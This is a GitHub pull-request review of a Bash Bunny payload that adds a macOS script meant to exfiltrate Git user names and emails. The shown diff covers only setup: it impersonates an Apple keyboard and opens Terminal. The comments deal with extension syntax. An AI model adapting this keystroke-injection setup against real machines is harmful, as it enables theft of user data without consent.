payloads/library/exfiltration/githubExfiltration/payload.txt

```diff
@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title:         OSX Payload to exfiltrate Git user name and email
+# Description:   Get Git user name and email from the Git global config and exfiltrate them
+# Author:        quentin_lamamy <contact@quentin-lamamy.fr>
+# Version:       1.0
+# Category:      Exfiltration
+# Attackmodes:   HID STORAGE
+# Target OS:     OSX
+# Dependency:    OSX Extensions
+#
+# Magenta solid           Setup
+# Yellow single blink     Attack in progress
+# Yellow double blink     Sync
+# Yellow triple blink     Cleanup
+# Green blink then solid  Finished
+
+LED SETUP
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
+
+OSX TERMINAL OPEN
```

Comment:
Im assuming you are attempting to open the terminal on MacOS.

You need to use the `RUN` extension before specifying OS  
```
RUN OSX terminal
```

Reply:
Hey, not a mistake, OSX TERMINAL OPEN refer to the OSX extension i previously PR ( it's in the comment, there is dependencies list)

I may change this in the extension PR which doesn't use the RUN command (maybe was not yet implemented when i have created this extension or just forgot to use it)

Reply:
Can you link me to the PR with the extension please?

Reply:
https://github.com/hak5/bashbunny-payloads/pull/239

Maybe my extension have changed since my PR, will check but it let you have a quick scope on what is this ext

Reply:
Awesome! Thank you! I will review the extension now!

Reply:
I just checked, it seems that my extension has been updated since the PR

Reply:
I see that, could you go through and update the extension to the newest version so I can merge it?

Reply:
Thank you! no rush, let me know when its finished!

Reply:
osx extension added, hope i don't fail my PR ^^

Reply:
Awesome! thank you! Ill review it now! 😊